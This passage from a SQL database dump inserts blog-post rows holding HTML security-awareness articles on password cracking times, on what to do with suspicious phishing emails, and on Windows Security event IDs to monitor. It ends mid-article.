[&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">“P@ssw0rd”: A few hours.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" 
value=\"6\">“correcthorsebatterystaple”: Over 50 years.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">“J7K$9Lm2@pX#rT4”: Potentially millions of years.</li>\r\n</ul>\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Future of Password Security</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While strong passwords remain essential today, a shift toward passwordless authentication methods is gaining traction. Emerging technologies like biometrics (e.g., fingerprint or facial recognition) and behavioral biometrics (e.g., how you type) may minimize password reliance.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Until then, practicing effective password management is vital to maintaining your cybersecurity.</p>\r\n\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Stay Secure Today</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity starts with strong passwords. Use tools like password strength meters or breach-checking platforms to evaluate your password\'s security and ensure your accounts are protected. A proactive approach to password hygiene not only protects your data but also keeps you one step ahead of potential hackers.</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 03:34:54', '2026-01-12 21:41:44', 'Information Security', 'How Long Does It Take for a Hacker to Crack a Password?', '', NULL),
(119, 'What Should You Do If You Receive a Suspicious Email', 'what-should-you-do-if-you-receive-a-suspicious-email', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails are one of the most common cybersecurity threats faced by individuals and businesses today. Cybercriminals use these fake messages to trick recipients into revealing sensitive information, such as passwords, credit card numbers, and even Social Security details, or to inject malware onto their devices. Protecting yourself and your organization from phishing attacks requires a keen eye, quick action, and a proactive approach.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This guide will not only help you identify phishing attempts but also provide actionable cybersecurity tips to mitigate the risks and prevent falling victim to email scams.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">What Is a Phishing Email?</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A phishing email is a fraudulent message designed to deceive you into taking harmful actions. These scams often masquerade as legitimate communications from trusted organizations, like banks, e-commerce platforms, or service providers. The ultimate goal of phishing is to either steal your information or infect your devices with malware.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The stakes are high, but with the right knowledge and precautions, you can stay one step ahead of cybercriminals.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">1. 
How to Identify a Phishing Email</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Before responding to an email or clicking a link, learn to recognize the red flags typically present in phishing emails. Here’s what to look for:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">a) Unknown Senders</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Be wary of emails from unfamiliar senders. Legitimate organizations use official and recognizable domain names for their communications. For instance:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">A trusted bank will use an email like <b><strong class=\"font-bold\">support@yourbank.com</strong></b>, not something random like <b><strong class=\"font-bold\">service@secure-login123.com</strong></b>.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If the sender’s address looks suspicious or unprofessional, treat the email as a potential phishing attempt.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">b) Urgent or Threatening Language</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishers often create a false sense of urgency to push you into quick, irrational actions. 
Common tactics include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Claiming your account will be deactivated unless you act immediately.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Warning of potential legal action.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Offering time-sensitive deals that feel “too good to be true.”</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Legitimate companies rarely use scare tactics. Take a moment to analyze the message before acting.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">c) Suspicious Links or Attachments</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Hover over any links in the email before clicking them to preview the URL. Watch for mismatched addresses, unfamiliar sites, or those designed to mimic trusted domains. Similarly, avoid downloading unexpected attachments, as they could contain malware.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">d) Poor Grammar and Spelling</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Many phishing emails feature glaring spelling or grammatical errors. 
While some scams are getting more sophisticated, sloppy language remains a telltale sign of a phishing attempt. Legitimate companies typically have professional proofreading standards.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">e) Requests for Sensitive Information</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">No reputable organization will ask for sensitive personal details, such as your passwords, Social Security numbers, or credit card information, via email. If an email requests such data, it’s almost always a red flag.</p>\r\n\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">2. Immediate Steps to Take If You Suspect a Phishing Email</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you receive an email that seems suspicious, don’t panic. Follow these practical steps to protect yourself:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">a) Don’t Click Links or Download Attachments</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Even if the email looks legitimate, refrain from interacting with any links or downloads. 
Phishing scams often rely on malicious links—designed to steal your credentials—or harmful attachments programmed to install malware on your device.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">b) Don’t Reply to the Email</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Replying to a phishing email can confirm your email address to scammers, opening the door to further phishing attempts. Ignore suspicious messages entirely.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">c) Report the Email</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">If it’s a work email, notify your IT department immediately so they can assess the risk and warn other employees.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">For personal emails, use your email provider’s built-in reporting feature to flag phishing attempts.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">d) Mark It as Spam or Junk</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Most email clients—like Gmail or Outlook—offer the ability to mark emails as spam. 
Doing so helps improve spam filters and reduces the likelihood of future phishing attempts landing in your inbox.</p>\r\n\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">3. Additional Steps to Bolster Your Security</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Beyond simply identifying and reporting phishing emails, you should take proactive measures to secure your devices and accounts.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">a) Scan Your Devices for Malware</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you suspect you may have interacted with a phishing email, run a full malware scan on your device immediately. 
Use reputable antivirus software, such as Norton or Malwarebytes, to detect and remove any harmful programs.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">b) Change Compromised Passwords</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If there’s any chance your account credentials have been exposed:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use strong, unique passwords for each account.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Avoid predictable passwords that include personal information, like your name or birthdate.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Implement a password manager like LastPass or Dashlane to securely store and generate robust passwords.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">c) Enable Two-Factor Authentication (2FA)</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Two-factor authentication adds an extra layer of security by requiring a second form of verification, such as:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 
[&amp;&gt;ul]:!pb-0\" value=\"1\">A randomly generated code delivered to your phone or email.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Biometric authentication, like a fingerprint reader or facial recognition.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With 2FA enabled, even cybercriminals who obtain your password will struggle to access your account.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">d) Keep Software Updated</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Regularly update your operating system, email software, and antivirus tools to ensure they’re equipped with the latest security patches. Outdated software can leave you vulnerable to new exploits.</p>\r\n\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">4. Educating Yourself and Others About Phishing</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Preventing phishing attacks is not just an individual responsibility—it’s a collective effort. 
Stay informed and share what you learn with others.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">a) Stay Updated on Cybersecurity Trends</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Follow cybersecurity blogs for the latest in phishing tactics and prevention.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Subscribe to alerts from trusted tech companies like Google and Microsoft.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Join forums or communities focused on cybersecurity best practices.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">b) Participate in Cybersecurity Training</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Many businesses now offer security training to employees, teaching essential skills such as identifying phishing scams and managing passwords. 
Even if your workplace doesn’t provide such programs, consider enrolling in an online course to strengthen your knowledge.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">c) Share Your Knowledge</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Help your family, friends, and colleagues stay safe:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Teach children and seniors how to spot phishing attempts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Share phishing prevention tips on your social media accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Encourage your workplace to host cybersecurity workshops.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The more people are aware of phishing scams and how to prevent them, the harder it becomes for scammers to succeed.</p>\r\n\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Takeaways for Preventing Phishing Email Scams</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails remain a prominent security threat, but you can outsmart scammers with 
careful vigilance and proactive measures:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Always look for red flags like unknown senders, poor grammar, or suspicious links.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Take immediate steps to protect your devices and accounts if you encounter a phishing email.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Stay informed about phishing tactics, and share your knowledge with others.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By following these tips, you not only secure your personal data but also contribute to creating a safer, more secure digital environment.</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 03:32:31', '2026-01-12 21:41:44', 'Information Security', 'What Should You Do If You Receive a Suspicious Email', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(120, 'The 8 Most Critical Windows Security Event IDs You Need to Monitor', 'the-8-most-critical-windows-security-event-ids-you-need-to-monitor', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When it comes to safeguarding your systems, staying ahead of potential threats is essential. For cybersecurity professionals, one of the most powerful tools available is the <b><strong class=\"font-bold\">Windows Security Log</strong></b>. Properly monitoring and understanding key event IDs in these logs can strengthen your <b><strong class=\"font-bold\">security posture</strong></b> and enhance your overall <b><strong class=\"font-bold\">crypto security</strong></b> protocols.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To help you stay proactive, this guide explores the <b><strong class=\"font-bold\">eight most critical Windows Security event IDs</strong></b> that you should be monitoring, why they matter, and how they can help protect your systems.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Monitoring Windows Security Event IDs Matters</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Windows Security Log maintains a detailed history of activity occurring within your systems. Key <b><strong class=\"font-bold\">security event IDs</strong></b> can serve as early warning signals for malicious activity or breaches. 
These fall into two important categories:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Single-occurrence events</strong></b> that may signal malicious actions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Abnormal frequency patterns</strong></b> that could indicate impending or ongoing security threats.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By being proactive with your monitoring, you gain the ability to detect—and defend against—potential issues <i><em class=\"italic\">before</em></i> they escalate.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Let\'s now break down the <b><strong class=\"font-bold\">critical Windows security event IDs</strong></b> you need to track carefully.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Event ID 4624 - Successful Logon</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This event represents every instance when a user successfully logs into your system. 
While successful logins often seem routine, they can hold valuable insights.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Monitor this Event?</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Detect unauthorized logins from inactive, restricted, or compromised accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Identify users logging in outside normal hours, which may indicate suspicious behavior.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Find concurrent logins across multiple resources, potentially signaling credential misuse.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Keeping an eye on Event ID 4624 helps ensure no unauthorized user gains access undetected, protecting your <b><strong class=\"font-bold\">crypto security</strong></b> and sensitive data.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. 
Event ID 4625 - Failed Logon</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Failed login attempts may indicate <b><strong class=\"font-bold\">brute-force attacks</strong></b> or other malicious password-guessing behavior.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Monitor this Event?</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Detect brute-force password attacks on user accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Identify potential dictionary attacks from automated tools.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Adjust your account lockout policies to avoid suspicious activity attempts.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Monitoring failed logon attempts allows you to mitigate password-related vulnerabilities and improve user account security.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Event ID 4728 - Member Added to Security-Enabled Global Group</h2>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. 
Event ID 4732 - Member Added to Security-Enabled Local Group</h2>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Event ID 4756 - Member Added to Security-Enabled Universal Group</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These event IDs specifically track <b><strong class=\"font-bold\">group membership changes</strong></b>, particularly for security-enabled groups. Unauthorized changes to these groups could lead to privilege escalation.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Monitor these Events?</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 